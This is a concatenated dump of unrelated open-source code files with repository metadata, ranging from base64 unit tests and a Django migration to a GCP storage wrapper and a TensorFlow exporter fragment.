b'MFRGG===': b'abc',
b'MFRGGZA=': b'abcd',
b'MFRGGZDF': b'abcde',
# Lower cases
b'me======': b'a',
b'mfra====': b'ab',
b'mfrgg===': b'abc',
b'mfrggza=': b'abcd',
b'mfrggzdf': b'abcde',
}
for data, res in tests.items():
eq(base64.b32decode(data, True), res)
eq(base64.b32decode(data.decode('ascii'), True), res)
self.assertRaises(binascii.Error, base64.b32decode, b'me======')
self.assertRaises(binascii.Error, base64.b32decode, 'me======')
# Mapping zero and one
eq(base64.b32decode(b'MLO23456'), b'b\xdd\xad\xf3\xbe')
eq(base64.b32decode('MLO23456'), b'b\xdd\xad\xf3\xbe')
map_tests = {(b'M1023456', b'L'): b'b\xdd\xad\xf3\xbe',
(b'M1023456', b'I'): b'b\x1d\xad\xf3\xbe',
}
for (data, map01), res in map_tests.items():
data_str = data.decode('ascii')
map01_str = map01.decode('ascii')
eq(base64.b32decode(data, map01=map01), res)
eq(base64.b32decode(data_str, map01=map01), res)
eq(base64.b32decode(data, map01=map01_str), res)
eq(base64.b32decode(data_str, map01=map01_str), res)
self.assertRaises(binascii.Error, base64.b32decode, data)
self.assertRaises(binascii.Error, base64.b32decode, data_str)
def test_b32decode_error(self):
for data in [b'abc', b'ABCDEF==', b'==ABCDEF']:
with self.assertRaises(binascii.Error):
base64.b32decode(data)
with self.assertRaises(binascii.Error):
base64.b32decode(data.decode('ascii'))
def test_b16encode(self):
eq = self.assertEqual
eq(base64.b16encode(b'\x01\x02\xab\xcd\xef'), b'0102ABCDEF')
eq(base64.b16encode(b'\x00'), b'00')
# Non-bytes
eq(base64.b16encode(bytearray(b'\x01\x02\xab\xcd\xef')), b'0102ABCDEF')
self.assertRaises(TypeError, base64.b16encode, "")
def test_b16decode(self):
eq = self.assertEqual
eq(base64.b16decode(b'0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102ABCDEF'), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode(b'00'), b'\x00')
eq(base64.b16decode('00'), b'\x00')
# Lower case is not allowed without a flag
self.assertRaises(binascii.Error, base64.b16decode, b'0102abcdef')
self.assertRaises(binascii.Error, base64.b16decode, '0102abcdef')
# Case fold
eq(base64.b16decode(b'0102abcdef', True), b'\x01\x02\xab\xcd\xef')
eq(base64.b16decode('0102abcdef', True), b'\x01\x02\xab\xcd\xef')
# Non-bytes
eq(base64.b16decode(bytearray(b"0102ABCDEF")), b'\x01\x02\xab\xcd\xef')
def test_decode_nonascii_str(self):
decode_funcs = (base64.b64decode,
base64.standard_b64decode,
base64.urlsafe_b64decode,
base64.b32decode,
base64.b16decode)
for f in decode_funcs:
self.assertRaises(ValueError, f, 'with non-ascii \xcb')
def test_ErrorHeritage(self):
self.assertTrue(issubclass(binascii.Error, ValueError))
class TestMain(unittest.TestCase):
def tearDown(self):
if os.path.exists(support.TESTFN):
os.unlink(support.TESTFN)
def get_output(self, *args, **options):
args = (sys.executable, '-m', 'base64') + args
return subprocess.check_output(args, **options)
def test_encode_decode(self):
output = self.get_output('-t')
self.assertSequenceEqual(output.splitlines(), (
b"b'Aladdin:open sesame'",
br"b'QWxhZGRpbjpvcGVuIHNlc2FtZQ==\n'",
b"b'Aladdin:open sesame'",
))
def test_encode_file(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'a\xffb\n')
output = self.get_output('-e', support.TESTFN)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
with open(support.TESTFN, 'rb') as fp:
output = self.get_output('-e', stdin=fp)
self.assertEqual(output.rstrip(), b'Yf9iCg==')
def test_decode(self):
with open(support.TESTFN, 'wb') as fp:
fp.write(b'Yf9iCg==')
output = self.get_output('-d', support.TESTFN)
self.assertEqual(output.rstrip(), b'a\xffb')
def test_main():
support.run_unittest(__name__)
if __name__ == '__main__':
test_main()
| 2.84375 | 3 |
appliance_catalog/migrations/0015_appliance_icon_py3.py | ChameleonCloud/portal | 3 | 3367 | <filename>appliance_catalog/migrations/0015_appliance_icon_py3.py
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-02-25 20:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
"""Updates ImageField syntax for later version.
"""
dependencies = [
('appliance_catalog', '0014_auto_20180625_1104'),
]
operations = [
migrations.AlterField(
model_name='appliance',
name='appliance_icon',
field=models.ImageField(blank=True, upload_to='appliance_catalog/icons/'),
),
]
| 1.210938 | 1 |
twitoff/twitter.py | ChristopherKchilton/twitoff-ChristopherKchilton | 1 | 3368 | <reponame>ChristopherKchilton/twitoff-ChristopherKchilton
"""Retrieve and request tweets from the DS API"""
import requests
import spacy
from .models import DB, Tweet, User
nlp = spacy.load("my_model")
def vectorize_tweet(tweet_text):
return nlp(tweet_text).vector
# Add and updates tweets
def add_or_update_user(username):
"""Adds and updates the user with twiter handle 'username'
to our database
"""
#TODO: Figure out
try:
r = requests.get(
f"https://lambda-ds-twit-assist.herokuapp.com/user/{username}")
user = r.json()
user_id = user["twitter_handle"]["id"]
# print(user)
# This is either respectively grabs or creates a user for our db
db_user = (User.query.get(user_id)) or User(id=user_id, name=username)
# This adds the db_user to our database
DB.session.add(db_user)
tweets = user["tweets"]
# if tweets:
# db_user.newest_tweet_id = tweets[0].id
for tweet in tweets:
tweet_vector = vectorize_tweet(tweet["full_text"])
tweet_id = tweet["id"]
db_tweet = (Tweet.query.get(tweet_id)) or Tweet(
id=tweet["id"], text=tweet["full_text"], vect=tweet_vector)
db_user.tweets.append(db_tweet)
DB.session.add(db_tweet)
except Exception as e:
print("Error processing {}: {}".format(username, e))
raise e
else:
DB.session.commit()
| 3.25 | 3 |
day22.py | p88h/aoc2017 | 1 | 3369 | import io
grid = {}
y = 0
x = 0
for l in io.open("day22.in").read().splitlines():
for x in range(len(l)):
grid[(y,x)] = l[x]
y += 1
y = y // 2
x = x // 2
dx = 0
dy = -1
r = 0
for iter in range(10000000):
if (y,x) not in grid or grid[(y,x)] == '.':
(dy, dx) = (-dx, dy)
grid[(y,x)] = 'W'
elif grid[(y,x)] == 'W':
grid[(y,x)] = '#'
r += 1
elif grid[(y,x)] == '#':
(dy, dx) = (dx, -dy)
grid[(y,x)] = 'F'
elif grid[(y,x)] == 'F':
(dy, dx) = (-dy, -dx)
grid[(y,x)] = '.'
y += dy
x += dx
print(r) | 3.03125 | 3 |
ansys/dpf/core/errors.py | TheGoldfish01/pydpf-core | 11 | 3370 | from grpc._channel import _InactiveRpcError, _MultiThreadedRendezvous
from functools import wraps
_COMPLEX_PLOTTING_ERROR_MSG = """
Complex fields cannot be plotted. Use operators to get the amplitude
or the result at a defined sweeping phase before plotting.
"""
_FIELD_CONTAINER_PLOTTING_MSG = """"
This fields_container contains multiple fields. Only one time-step
result can be plotted at a time. Extract a field with
``fields_container[index]``.
"""
class DpfVersionNotSupported(RuntimeError):
"""Error raised when the dpf-core/grpc-dpf python features are not
supported by the DPF gRPC server version."""
def __init__(self, version, msg=None):
if msg is None:
msg = "Feature not supported. Upgrade the server to "
msg += str(version)
msg += " version (or above)."
RuntimeError.__init__(self, msg)
class DpfValueError(ValueError):
"""Error raised when a specific DPF error value must be defined."""
def __init__(
self, msg="A value that has been set leads to incorrect DPF behavior."
):
ValueError.__init__(self, msg)
class InvalidTypeError(ValueError):
"""Error raised when a parameter has the wrong type."""
def __init__(self, data_type, parameter_name):
msg = (
"A "
+ data_type
+ " must be used for the following parameter: "
+ parameter_name
+ "."
)
ValueError.__init__(self, msg)
class LocationError(ValueError):
"""Error raised when using an invalid location."""
def __init__(self, msg="Invalid location"):
ValueError.__init__(self, msg)
class ComplexPlottingError(ValueError):
"""Error raised when attempting to plot a field with complex data."""
def __init__(self, msg=_COMPLEX_PLOTTING_ERROR_MSG):
ValueError.__init__(self, msg)
class FieldContainerPlottingError(ValueError):
"""Error raised when attempting to plot a fields_container containing
multiple fields."""
def __init__(self, msg=_FIELD_CONTAINER_PLOTTING_MSG):
ValueError.__init__(self, msg)
class InvalidANSYSVersionError(RuntimeError):
"""Error raised when the Ansys verion is invalid."""
def __init__(self, msg=""):
RuntimeError.__init__(self, msg)
class DPFServerException(Exception):
"""Error raised when the DPF server has encountered an error."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class DPFServerNullObject(Exception):
"""Error raised when the DPF server cannot find an object."""
def __init__(self, msg=""):
Exception.__init__(self, msg)
class InvalidPortError(OSError):
"""Error raised when used an invalid port when starting DPF."""
def __init__(self, msg=""):
OSError.__init__(self, msg)
def protect_grpc(func):
"""Capture gRPC exceptions and return a more succinct error message."""
@wraps(func)
def wrapper(*args, **kwargs):
"""Capture gRPC exceptions."""
# Capture gRPC exceptions
try:
out = func(*args, **kwargs)
except (_InactiveRpcError, _MultiThreadedRendezvous) as error:
details = error.details()
if "object is null in the dataBase" in details:
raise DPFServerNullObject(details) from None
raise DPFServerException(details) from None
return out
return wrapper
| 2.296875 | 2 |
deep_disfluency/feature_extraction/wer_calculation_from_final_asr_results.py | askender/deep_disfluency | 0 | 3371 | from mumodo.mumodoIO import open_intervalframe_from_textgrid
import numpy
from deep_disfluency.utils.accuracy import wer
final_file = open('wer_test.text', "w")
ranges1 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASR_ranges.text")]
ranges2 = [line.strip() for line in open(
"/media/data/jh/simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASR_ranges.text")]
for ranges in [ranges1, ranges2]:
final_file.write("\n\n")
for r in ranges:
for s in ["A", "B"]:
iframe = open_intervalframe_from_textgrid("{0}{1}.TextGrid"
.format(r, s))
hyp = " ".join(iframe['Hyp']['text'])
ref = " ".join(iframe['Ref']['text'])
wer = wer(ref, hyp)
cost = wer(ref, hyp, macro=True)
print r, s, wer
print>>final_file, r, s, wer, cost
final_file.close()
# Based on the results, output the 'good' ASR results
results = open("wer_test.text")
no_ho = 0
no_test = 0
ingood = True
file = open("../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfHeldoutASRgood_ranges.text", "w")
for l in results:
# print l
if l == "\n":
print no_ho
no_ho = 0
file.close()
file = open(
"../../../simple_rnn_disf/rnn_disf_detection/data/disfluency_detection/swda_divisions_disfluency_detection/SWDisfTestASRgood_ranges.text",
"w")
continue
if float(l.strip('\n').split(" ")[
2]) < 0.4: # both speakers are under 40% error rate- likely half decent separation
# print l
if ingood and "B" in l.strip("\n").split(" ")[1]:
no_ho += 1
#file.write(l.strip('\n').split(" ")[0]+l.strip('\n').split(" ")[1]+"\n")
file.write(l.strip('\n').split(" ")[0] + "\n")
ingood = True
else:
ingood = False
print no_ho
results.close()
file.close()
| 2.40625 | 2 |
newsweec/utils/_dataclasses.py | Adwaith-Rajesh/newsweec | 13 | 3372 | from dataclasses import dataclass
from dataclasses import field
from time import time
from typing import Any
from typing import Callable
from typing import Dict
from typing import List
from typing import Optional
from typing import Tuple
@dataclass
class NewUser:
"""Deals with the commands the user is currently sending"""
user_id: int
chat_id: int
command: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=}"
@dataclass
class UserCommand:
"""Stores the latest command sent by the user"""
user_id: int
command: str
insert_time: int = int(time()) # for garbage collection
def __repr__(self) -> str:
return f"{self.user_id=} {self.command=} {self.insert_time=}"
@dataclass
class MessageInfo:
"""Important things in the message"""
user_id: int
chat_id: int
message_id: int
text: str
def __repr__(self) -> str:
return f"{self.user_id=} {self.chat_id=} {self.message_id=} {self.text=}"
@dataclass
class UserDBInfo:
"""Info about the user from the DB"""
feed: bool # if false, the bot will not send any news feeds on a daily basis
user_id: int
db_id: int
topics: List[str] = field(default_factory=lambda: [])
def __repr__(self) -> str:
return f"{self.user_id=} {self.feed=} {self.db_id=} {self.topics=}"
@dataclass
class StagedFunction:
"""For FunctionStagingArea"""
fn: Callable[..., Any]
args: Optional[Tuple[Any, ...]] = None
kwargs: Optional[Dict[str, Any]] = None
| 2.96875 | 3 |
vivo2notld/definitions/person_definition.py | gwu-libraries/vivo2notld | 5 | 3373 | <filename>vivo2notld/definitions/person_definition.py
from .document_summary import definition as document_summary_definition
from .organization_summary import definition as organization_summmary_definition
definition = {
"where": "?subj a foaf:Person .",
"fields": {
"name": {
"where": "?subj rdfs:label ?obj ."
},
#Contact info
"email": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasEmail ?vce .
?vce a vcard:Email, vcard:Work .
?vce vcard:email ?obj .
"""
},
"telephone": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasTelephone ?vct .
?vct a vcard:Telephone .
?vct vcard:telephone ?obj .
"""
},
"address": {
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasAddress ?obj .
""",
"definition": {
"where": "?subj a vcard:Address .",
"fields": {
"address": {
"where": "?subj vcard:streetAddress ?obj ."
},
"city": {
"where": "?subj vcard:locality ?obj ."
},
"state": {
"where": "?subj vcard:region ?obj ."
},
"zip": {
"where": "?subj vcard:postalCode ?obj ."
}
}
}
},
"website": {
"list": True,
"where": """
?subj obo:ARG_2000028 ?vc .
?vc a vcard:Kind .
?vc vcard:hasURL ?vcu .
?vcu a vcard:URL .
?vcu vcard:url ?obj .
""",
"optional": True
},
"researchArea": {
"where": """
?subj vivo:hasResearchArea ?ra .
?ra rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"geographicFocus": {
"where": """
?subj vivo:geographicFocus ?gf .
?gf rdfs:label ?obj .
""",
"optional": True,
"list": True
},
"overview": {
"where": "?subj vivo:overview ?obj .",
"optional": True,
},
"positions": {
"where": "?subj vivo:relatedBy ?obj .",
"definition": {
"where": "?subj a vivo:Position .",
"fields": {
"title": {
"where": "?subj rdfs:label ?obj ."
},
"organization": {
"where": "?subj vivo:relates ?obj .",
"definition": organization_summmary_definition
}
}
},
"optional": True,
"list": True
},
"publications": {
"where": """
?subj vivo:relatedBy ?aship .
?aship a vivo:Authorship .
?aship vivo:relates ?obj .
""",
"definition": document_summary_definition,
"optional": True,
"list": True
}
}
}
| 2.203125 | 2 |
apart/search.py | ruslan-ok/ServerApps | 1 | 3374 | <filename>apart/search.py
from django.db.models import Q
from hier.search import SearchResult
from .models import app_name, Apart, Meter, Bill, Service, Price
def search(user, query):
result = SearchResult(query)
lookups = Q(name__icontains=query) | Q(addr__icontains=query)
items = Apart.objects.filter(user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'apart', item.id, None, item.name, item.addr, False)
lookups = Q(info__icontains=query)
items = Meter.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(info__icontains=query) | Q(url__icontains=query)
items = Bill.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(name__icontains=query) | Q(abbr__icontains=query)
items = Service.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name)
lookups = Q(info__icontains=query)
items = Price.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name)
return result.items
| 2.203125 | 2 |
pyrevolve/experiment_management.py | MRebolle/Battery-Robot | 0 | 3375 | <filename>pyrevolve/experiment_management.py<gh_stars>0
import os
import shutil
import numpy as np
from pyrevolve.custom_logging.logger import logger
import sys
class ExperimentManagement:
# ids of robots in the name of all types of files are always phenotype ids, and the standard for id is 'robot_ID'
def __init__(self, settings):
self.settings = settings
manager_folder = os.path.dirname(self.settings.manager)
self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run)
self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution')
self._gen_num = 0
def create_exp_folders(self):
if os.path.exists(self.experiment_folder):
shutil.rmtree(self.experiment_folder)
os.makedirs(self.experiment_folder)
os.mkdir(self.data_folder)
folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness',
'battery', 'phenotype_images', 'failed_eval_robots']
for folder in folders:
os.mkdir(os.path.join(self.data_folder, folder))
@property
def experiment_folder(self):
return self._experiment_folder
@property
def data_folder(self):
return self._data_folder
def export_genotype(self, individual):
if self.settings.recovery_enabled:
individual.export_genotype(self.data_folder)
def export_phenotype(self, individual):
if self.settings.export_phenotype:
individual.export_phenotype(self.data_folder)
def export_fitnesses(self, individuals):
folder = self.data_folder
for individual in individuals:
individual.export_fitness(folder)
def export_fitness(self, individual):
folder = os.path.join(self.data_folder, 'fitness')
individual.export_fitness(folder)
def export_objectives(self, individual):
folder = os.path.join(self.data_folder, 'objectives')
individual.export_objectives(folder)
def export_battery(self, individual):
folder = os.path.join(self.data_folder, 'battery')
individual.export_battery(folder)
def export_behavior_measures(self, _id, measures):
filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')
with open(filename, "w") as f:
if measures is None:
f.write(str(None))
else:
for key, val in measures.items():
f.write(f"{key} {val}\n")
def export_phenotype_images(self, dirpath, individual):
individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png'))
individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png'))
def export_failed_eval_robot(self, individual):
individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf')
def export_snapshots(self, individuals, gen_num):
self._gen_num = gen_num
if self.settings.recovery_enabled:
path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}')
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
for ind in individuals:
self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind)
logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals')
def experiment_is_new(self):
if not os.path.exists(self.experiment_folder):
return True
path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness')))
if len(files) == 0:
return True
else:
return False
def read_recovery_state(self, population_size, offspring_size):
snapshots = []
for r, d, f in os.walk(self.experiment_folder):
for dir in d:
if 'selectedpop' in dir:
exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir)) if os.path.isfile(os.path.join(self.experiment_folder, dir, name))])
if exported_files == (population_size * 2): # body and brain files
snapshots.append(int(dir.split('_')[1]))
if len(snapshots) > 0:
# the latest complete snapshot
last_snapshot = np.sort(snapshots)[-1]
# number of robots expected until the snapshot
n_robots = population_size + last_snapshot * offspring_size
else:
last_snapshot = -1
n_robots = 0
robot_ids = []
for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')):
for file in f:
robot_ids.append(int(file.split('.')[0].split('_')[-1]))
last_id = np.sort(robot_ids)[-1]
# if there are more robots to recover than the number expected in this snapshot
if last_id > n_robots:
# then recover also this partial offspring
has_offspring = True
else:
has_offspring = False
return last_snapshot, has_offspring, last_id+1
def plot_path(self, data_source: str, filename: str, file_extension=".png"):
data_folder = os.path.join(self._data_folder, data_source)
if not os.path.exists(data_folder):
os.mkdir(data_folder)
return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
| 2.359375 | 2 |
books/model/Instrumentation.py | nudglabs/books-python-wrappers | 9 | 3376 | #$Id$
class Instrumentation:
"""This class is used tocreate object for instrumentation."""
def __init__(self):
"""Initialize parameters for Instrumentation object."""
self.query_execution_time = ''
self.request_handling_time = ''
self.response_write_time = ''
self.page_context_write_time = ''
def set_query_execution_time(self, query_execution_time):
"""Set query execution time.
Args:
query_execution_time(str): Query execution time.
"""
self.query_execution_time = query_execution_time
def get_query_execution_time(self):
"""Get query execution time.
Returns:
str: Query execution time.
"""
return self.query_execution_time
def set_request_handling_time(self, request_handling_time):
"""Set request handling time.
Args:
request_handling_time(str): Request handling time.
"""
self.request_handling_time = request_handling_time
def get_request_handling_time(self):
"""Get request handling time.
Returns:
str: Request handling time.
"""
return self.request_handling_time
def set_response_write_time(self, response_write_time):
"""Set response write time.
Args:
response_write_time(str): Response write time.
"""
self.response_write_time = response_write_time
def get_response_write_time(self):
"""Get response write time.
Returns:
str: Response write time.
"""
return self.response_write_time
def set_page_context_write_time(self, page_context_write_time):
"""Set page context write time.
Args:
page_context_write_time(str): Page context write time.
"""
self.page_context_write_time = page_context_write_time
def get_page_context_write_time(self):
"""Get page context write time.
Returns:
str: Page context write time.
"""
return self.page_context_write_time
| 2.578125 | 3 |
DPR/setup.py | sophiaalthammer/parm | 18 | 3377 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| 1.132813 | 1 |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py | BillionsRichard/pycharmWorkspace | 0 | 3378 | # encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: <EMAIL>
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
输入:[[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
输出: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
| 3.203125 | 3 |
pcf/particle/gcp/storage/storage.py | davidyum/Particle-Cloud-Framework | 0 | 3379 | <reponame>davidyum/Particle-Cloud-Framework<filename>pcf/particle/gcp/storage/storage.py
from pcf.core.gcp_resource import GCPResource
from pcf.core import State
import logging
from google.cloud import storage
from google.cloud import exceptions
logger = logging.getLogger(__name__)
class Storage(GCPResource):
"""
This is the implementation of Google's storage service.
"""
flavor = "storage"
equivalent_states = {
State.running: 1,
State.stopped: 0,
State.terminated: 0
}
UNIQUE_KEYS = ["gcp_resource.name"]
def __init__(self, particle_definition):
super(Storage, self).__init__(particle_definition=particle_definition, resource=storage)
self.bucket_name = self.desired_state_definition["name"]
self._set_unique_keys()
def _set_unique_keys(self):
"""
Logic that sets keys from state definition that are used to uniquely identify the storage bucket
"""
self.unique_keys = Storage.UNIQUE_KEYS
def get_status(self):
"""
Determines if the bucket exists
Returns:
status (dict)
"""
try:
bucket = self.client.get_bucket(self.bucket_name)
return bucket
except exceptions.NotFound:
return {"status": "missing"}
def _terminate(self):
"""
Deletes the storage bucket
Returns:
response of gcp delete
"""
return self.client.bucket(bucket_name=self.bucket_name).delete()
def _start(self):
"""
Creates the storage bucket
Returns:
response of create_bucket
"""
# create_definition = pcf_util.keep_and_replace_keys(self.get_desired_state_definition(),
# S3Bucket.START_PARAMS)
return self.client.bucket(bucket_name=self.bucket_name).create()
def _stop(self):
"""
S3 bucket does not have a stopped state so it calls terminate.
"""
return self.terminate()
def sync_state(self):
"""
Calls get status and then sets the current state.
"""
full_status = self.get_status()
if full_status:
if isinstance(full_status, self.resource.Bucket):
self.state = State.running
else:
self.state = State.terminated
self.current_state_definition = self.desired_state_definition
def download_object(self, blob_name, file_obj, **kwargs):
"""
Downloads a file from the S3 bucket.
Args:
blob_name (str): Object name (Required)
file_obj (str): file name for the download (Required)
**kwargs: Options for boto3 get_object (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return self.resource.Blob(blob_name, bucket).download_file(file_obj, **kwargs)
def delete_object(self, blob_name):
"""
Deletes an object in the storage bucket.
Args:
blob_name (str): Object Key name (Required)
"""
bucket = self.client.get_bucket(self.bucket_name)
return bucket.delete_blob(blob_name)
def list_objects(self, **kwargs):
"""
Lists all objects in the storage bucket.
Args:
**kwargs: Options for boto3 list_objects (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return list(bucket.list_blobs(**kwargs))
def put_object(self, blob_name, file_obj, **kwargs):
"""
Puts an object in the S3 bucket.
Args:
blob_name (str): Object Key name (Required)
file_obj (object): the object to put into the bucket (Required)
**kwargs: Options for boto3 put_object (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return self.resource.Blob(blob_name, bucket).upload_from_file(file_obj, **kwargs)
def put_file(self, blob_name, file, **kwargs):
"""
Puts a file in the S3 bucket.
Args:
blob_name (str): Object Key name (Required)
file (file): the file to put into the bucket (Required)
**kwargs: Options for boto3 upload_file (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return self.resource.Blob(blob_name, bucket).upload_from_filename(file, **kwargs)
def _update(self):
"""
Not Implemented
"""
pass
def is_state_equivalent(self, state1, state2):
"""
Determines if states are equivalent. Uses equivalent_states defined in the S3Bucket class.
Args:
state1 (State):
state1 (State):
Returns:
bool
"""
return Storage.equivalent_states.get(state1) == Storage.equivalent_states.get(state2)
| 2.578125 | 3 |
cimcb/utils/smooth.py | CIMCB/cimcb | 5 | 3380 | import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
# WSZ: smoothing window size needs, which must be odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
| 2.984375 | 3 |
ezeeai/core/extensions/best_exporter.py | jmarine/ezeeai | 19 | 3381 | from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
